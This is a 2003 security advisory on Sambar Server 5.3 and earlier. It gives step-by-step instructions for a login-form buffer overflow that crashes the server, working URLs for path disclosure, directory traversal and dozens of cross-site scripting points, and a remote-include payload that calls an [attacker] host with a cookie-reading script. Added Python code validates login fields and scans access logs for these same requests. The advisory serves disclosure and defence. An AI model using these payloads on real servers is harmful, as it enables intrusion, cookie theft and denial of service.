6th Apr 2003 [SBWID-6108]
COMMAND
Sambar Server buffer overflow and sample cgi / script vulnerabilities
SYSTEMS AFFECTED
All Sambar Server systems with sysuser login included (buffer overflow)
Sambar 5.3 and prior (script vulns)
PROBLEM
1 Buffer overflow
=================
Lorenzo Manuel Hernandez Garcia-Hierro [[email protected]]
[http://www.lorenzohgh.com] found :
This vulnerability is caused because the Sambar Server daemon doesn't
examine the buffer and sizes of the login form transfer; the only
protection for the server is the values in the form in the HTML code
(the max value of the RCPassword input). This can be a vulnerability if
the server is publicly exposed and the directories of the sysuser are
known.
METHOD TO EXPLOIT IT:
You must be sure of and know the true path (under the Sambar root, like
c:\sambar) of the sysuser login form; now follow these easy steps:
1st: go to the web server sysuser login form path, like
http://localhost/sysuser/index.stm (you must specify the index.stm for
the RPC called locally through index.stm).
2nd: copy the code of the form (the whole page) and paste it into a
blank text file, then rename it to something.html.
3rd: put in the correct fields the http://localhost or URL of your
Sambar server installation; this is for the form and images, and of
course the form must connect to the correct URL address of the server
script. The code goes like this:
[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more buffer overflow, like to a cgi script (this can be a DoS attack)
[INPUT TYPE=hidden NAME="start" VALUE="1"]
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25"]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/"]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/"] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name"]
4th: now you can try to refresh and log in; use a valid user and
password if you want to prove vulnerability number one, or go to the
6th step!
5th: now you must push the submit button and wait; if you are running
the server on your computer, the server picks up and becomes unstable,
and if you continue sending these attempts the server must be
restarted, or the computer restarted, during the attack!
6th: the second vulnerability is the buffer overflow in the password
form fields (you can learn more about this in the Allaire advisory
'ColdFusion Buffer OverFlow in form fields'); you can insert more than a
million characters and submit it, but you must edit the form code on
your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than hundred thousand characters"]
and... 7th: push submit and the server picks up too!
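The root cause above is that the only size limit on the login form is the client-side MAXLENGTH, which a hand-edited copy of the form simply drops. As an added example (not Sambar's code and not part of the advisory), this is the kind of server-side check that closes that gap: it rejects an oversized body before buffering it, caps each field independently of what the HTML says, and refuses the RCShome/RCSbrowse/RCSpath values that the advisory flags as pointing into /config/. The field names come from the form above; the numeric limits and the idea of a private /config/ tree are assumptions about a fixed server.

```python
from urllib.parse import parse_qs
import posixpath

# Limits a fixed server would enforce on its own side (assumed values).
MAX_CONTENT_LENGTH = 4096                          # whole login body
MAX_FIELD_LENGTH = {"RCpwd": 40, "RCuser": 64}     # mirrors the form's MAXLENGTH=40
DEFAULT_FIELD_LENGTH = 256
PATH_FIELDS = ("RCSpath", "RCShome", "RCSbrowse")
PRIVATE_TREES = ("/config/",)                      # the tree the advisory flags as "the problem"

def check_content_length(headers):
    """Reject an oversized body before buffering it: the HTML MAXLENGTH is
    client-side only and says nothing about what the client really sent."""
    try:
        n = int(headers.get("Content-Length", "0"))
    except ValueError:
        return False, "bad Content-Length"
    if n < 0 or n > MAX_CONTENT_LENGTH:
        return False, "body too large"
    return True, "ok"

def normalise(path):
    """Collapse ./, ../ and backslashes so /inbox/../config/ is seen as /config/."""
    clean = posixpath.normpath("/" + path.replace("\\", "/").lstrip("/"))
    return clean if clean.endswith("/") else clean + "/"

def validate_login_form(body):
    """Return (ok, reason) for a decoded application/x-www-form-urlencoded body."""
    if len(body) > MAX_CONTENT_LENGTH:
        return False, "body too large"
    try:
        fields = parse_qs(body, keep_blank_values=True, max_num_fields=32)
    except ValueError:
        return False, "too many fields"
    for name, values in fields.items():
        limit = MAX_FIELD_LENGTH.get(name, DEFAULT_FIELD_LENGTH)
        if any(len(v) > limit for v in values):
            return False, f"{name} exceeds {limit} bytes"
    for name in PATH_FIELDS:
        for v in fields.get(name, []):
            if normalise(v).startswith(PRIVATE_TREES):
                return False, f"{name} points into a private tree: {v}"
    return True, "ok"
```

A server applying these two checks never copies a 100,000-character RCpwd into a fixed buffer, which is what the sixth step above relies on.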
2 Scripts
=========
Grégory Le Bras aka GaLiaRePt [http://www.Security-Corporation.com]
says :
http://www.security-corp.org/index.php?ink=4-15-1
http://www.security-corporation.com/index.php?id=advisories&a=012-FR
* Path Disclosure :
===================
Sambar's default installation of the CGI bin directory contains a
testcgi.exe and an environ.pl that allow remote users to view
information regarding the operating system and the web server's
directory. These vulnerabilities can be triggered by a remote user
submitting a specially crafted HTTP request.
- Exploits :
http://[target]/cgi-bin/environ.pl
http://[target]/cgi-bin/testcgi.exe
Will produce the following output:
- environ.pl :
--------------
Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:
- testcgi.exe :
---------------
Test CGI ... Version 1.00 [ build date 8-03-97 ]
QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE
* Directory Disclosure :
========================
Other security vulnerabilities were found in Sambar which allow an
attacker to reveal the contents of the files and directories on the
web server, even if they should not be revealed.
These vulnerabilities can be simply exploited by requesting a specially
crafted URL utilizing the iecreate.stm and ieedit.stm applications with
a '../' appended.
- Exploits :
http://[target]/sysuser/docmgr/iecreate.stm?template=../
http://[target]/sysuser/docmgr/ieedit.stm?url=../
* Cross Site Scripting :
========================
Many exploitable bugs were found in Sambar Server which cause script
execution on the client's computer by following a crafted URL.
This kind of attack, known as "Cross-Site Scripting Vulnerability", is
present in many sections of the web site; an attacker can input
specially crafted links and/or other malicious scripts.
- Exploits :
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
http://[target]/netutils/whodata.stm?sitename=[hostile_code]
http://[target]/netutils/findata.stm?user=[hostile_code]
http://[target]/netutils/findata.stm?host=[hostile_code]
http://[target]/isapi/testisa.dll?check1=[hostile_code]
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
http://[target]/cgi-bin/testcgi.exe?[hostile_code]
- Another Cross Site Scripting can be exploited with a remote file
in which the hostile code is included, like this :
http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm
The hostile code could be :
[script]alert("Cookie="+document.cookie)[/script]
(opens a window with the cookie of the visitor.)
(replace [] by <>)
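With no vendor fix available, the practical defence for the three script-level issues above (sample CGI probes, '../' and remote-URL values to the docmgr templates, and script markup in the listed .stm/.dll/.pl parameters) is to spot them in the web server's access log. As an added example, not from the advisory or from Sambar, this scanner turns the exploit URLs above into detection rules and runs them over a constructed log. It assumes Common Log Format lines; the client addresses and the 203.0.113.9 host are constructed sample values.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_CGIS = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
TRAVERSAL_PARAMS = {"/sysuser/docmgr/iecreate.stm": "template",
                    "/sysuser/docmgr/ieedit.stm": "url"}
XSS_PREFIXES = ("/netutils/", "/isapi/", "/cgi-bin/", "/samples/",
                "/wwwping/", "/syshelp/", "/sysuser/docmgr/")
SCRIPT_RE = re.compile(r"<\s*script|javascript:", re.I)
# Common Log Format: client, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return (category, detail) findings for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()          # Windows paths are case-insensitive
    query = unquote(parts.query)                # decode %3C etc. before matching
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if path in SAMPLE_CGIS:
        findings.append(("sample-cgi-probe", path))
    param = TRAVERSAL_PARAMS.get(path)
    for value in (params.get(param, []) if param else []):
        if ".." in value.replace("\\", "/"):
            findings.append(("directory-disclosure", f"{param}={value}"))
        elif value.lower().startswith(("http://", "https://")):
            findings.append(("remote-include", f"{param}={value}"))
    if path.startswith(XSS_PREFIXES) and SCRIPT_RE.search(query):
        findings.append(("xss", query))         # covers the bare testcgi.exe?[code] case too
    return findings

def scan_log(lines):
    """Return (client, category, detail) for every suspicious request."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        client, _method, target, _status = m.groups()
        hits.extend((client, cat, detail) for cat, detail in classify(target))
    return hits

# Constructed sample log: 10.0.0.5 walks through the advisory's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Apr/2003:10:00:01 +0000] "GET /cgi-bin/environ.pl HTTP/1.0" 200 512',
    '10.0.0.5 - - [06/Apr/2003:10:00:02 +0000] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.0" 200 1024',
    '10.0.0.5 - - [06/Apr/2003:10:00:03 +0000] "GET /sysuser/docmgr/ieedit.stm?url=http://203.0.113.9/hostile_file.htm HTTP/1.0" 200 1024',
    '10.0.0.5 - - [06/Apr/2003:10:00:04 +0000] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 300',
    '192.0.2.7 - - [06/Apr/2003:10:00:05 +0000] "GET /index.stm HTTP/1.1" 200 2048',
]
```

Running scan_log(SAMPLE_LOG) yields four hits, all from 10.0.0.5, one per category; the benign request from 192.0.2.7 produces none.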
SOLUTION
None yet